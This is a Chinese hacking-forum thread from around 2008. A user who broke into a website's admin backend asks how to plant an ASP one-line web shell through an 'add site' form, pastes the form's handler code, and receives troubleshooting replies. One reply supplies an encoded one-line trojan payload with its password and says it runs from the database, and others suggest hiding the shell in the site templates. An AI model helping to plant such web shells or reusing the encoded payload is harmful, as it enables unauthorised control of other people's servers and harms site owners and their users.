返回列表 发帖

[讨论]如何将一句话木马闭合

[讨论]如何将一句话木马闭合
议题作者:xxzk1984
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

昨天研究一个站,进入了后台,如图1所示
由于通过其他方式拿到了网站的代码,所以知道其数据库为asp的,想到了在添加新网址的那里插入一句话马。
所以加入一句话马,如图2所示
但提交后提示“表单不完整!”
   2.gif (492 KB)


2007-12-12 18:03   3.gif (295 KB)

2007-12-12 18:03   4.gif (234 KB)

2007-12-12 18:03  
所以考虑到是不是asp木马没有闭合的问题,改变方法如图3所示
实在是搞不动程序怎么做的限制,兄弟们帮探讨探讨。。
表单提交的代码如下:
Code Language : ASP
<%
if Session(\"isAdmin\")<>true Then
Response.Write \"非法闯入!\"
Response.End
End if
%>
<!--#include file=\"conn.asp\"-->
<%
title=request(\"title\")
url=request(\"url\")
leibie=request(\"leibie\")
memo=request(\"memo\")
if title=\"\" or url=\"\" or leibie=\"\" then
   response.write \"<font color='red'>表单不完整!</font><br>\"
else
   set r=server.createobject(\"adodb.recordset\")
   r.open \"select * from detail where title='\"&title&\"'\",conn,1,3
   r.addnew
     r(\"title\")=title
     r(\"url\")=url
     if memo=\"\" then
       r(\"memo\")=\" \"&memo
     else
       r(\"memo\")=memo
     end if
     r(\"classid\")=leibie
     r(\"verity\")=1
     r.update
     response.write \"<font color='red'>新网站添加成功!</font><br>\"
     response.write \"<a href='#' onclick='window.close()'>关闭本窗口</a>\"
end if
%>
Parsed in 0.007 seconds
谢谢了
ps:麻烦冰血帮我转为正式的吧,要不老发贴讨论感觉好麻烦的哦。
帖子9 精华0 积分28 阅读权限40 在线时间41 小时 注册时间2005-4-7 最后登录2008-7-11 查看详细资料TOP 您知道您年薪应是多少?

沉渊
晶莹剔透§烈日灼然

if title="" or url="" or leibie="" then
      response.write "<font color=&#39;red&#39;>表单不完整!</font><br>"
把这3个地方填完Dreamless world……
帖子25 精华0 积分179 阅读权限40 性别男 在线时间215 小时 注册时间2007-2-11 最后登录2008-6-30 查看详细资料TOP 让女孩一夜变的更有女人味

゛小︷帅!﹊
晶莹剔透§烈日灼然

TOP

复制内容到剪贴板
代码:
if title="" or url="" or leibie="" then
      response.write "<font color=&#39;red&#39;>表单不完整!</font><br>"
呵呵,这个地方没写完..。

楼主在本地测试吧?

帖子58 精华0 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 查看个人网站
查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

xxzk1984
晶莹剔透§烈日灼然

TOP

https://forum.eviloctal.com/p_w_ ... ff46330e2cf547c.gif
从这个图就可以看出来我提交的是完整的啊。但是我填入后他提示信息不完整,非本地测试。
帖子9 精华0 积分28 阅读权限40 在线时间41 小时 注册时间2005-4-7 最后登录2008-7-11 查看详细资料TOP

hackest
运维管理组

TOP

类别,没选
My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP 少女暴富的隐秘(图)

优格
荣誉会员

TOP

一句话木马用这个看看
复制内容到剪贴板
代码:
┼癥污爠煥敵瑳∨∣┩>
密码是#
能在数据库中执行
帖子227 精华2 积分797 阅读权限100 性别男 在线时间123 小时 注册时间2005-5-29 最后登录2008-7-23 查看详细资料TOP 少女暴富的隐秘(图)

xxzk1984
晶莹剔透§烈日灼然

TOP

引用:
引用第4楼hackest于2008-01-01 12:38发表的 :
类别,没选

可能当时抓的图没有,但是当时我选择了。
帖子9 精华0 积分28 阅读权限40 在线时间41 小时 注册时间2005-4-7 最后登录2008-7-11 查看详细资料TOP 让女孩一夜变的更有女人味

xxzk1984
晶莹剔透§烈日灼然

TOP

引用:
引用第5楼优格于2008-01-04 00:08发表的 :
一句话木马用这个看看
复制内容到剪贴板
代码:
┼癥污爠煥敵瑳∨∣┩>
密码是#
能在数据库中执行
这个是什么代码 。。。怎么没看懂呢。。
帖子9 精华0 积分28 阅读权限40 在线时间41 小时 注册时间2005-4-7 最后登录2008-7-11 查看详细资料TOP

hack4521
晶莹剔透§烈日灼然

TOP

引用:
引用第7楼xxzk1984于2008-01-04 22:10发表的 :

这个是什么代码 。。。怎么没看懂呢。。
这上是他转换成unicod格式的一句话木马。。
一般在数据库里用。
不知道asp会不会认它?
帖子8 精华0 积分30 阅读权限40 在线时间13 小时 注册时间2007-3-9 最后登录2008-5-21 查看详细资料TOP

kazhi12
晶莹剔透§烈日灼然

TOP

这后台看着功能还不错
为什么要在这页面
一句话加别的地方不行?

9-14 行就是关键我讲你来的时候我会让你的鲜血顺着我的刀流下

帖子7 精华0 积分22 阅读权限40 性别男 来自地球 在线时间14 小时 注册时间2006-5-15 最后登录2008-4-18 查看详细资料TOP

simpleboy
晶莹剔透§烈日灼然

TOP

为什么不加在模版 里面啊  只做安静的观众
帖子72 精华2 积分224 阅读权限40 在线时间42 小时 注册时间2006-10-23 最后登录2008-7-2 查看详细资料TOP

chenck
晶莹剔透§烈日灼然

TOP

呵呵,我是新手,关注中。我也想问了,为什么不再模板里加啊。
帖子2 精华0 积分9 阅读权限40 在线时间2 小时 注册时间2007-9-8 最后登录2008-1-11 查看详细资料TOP

xxzk1984
晶莹剔透§烈日灼然

TOP

返回列表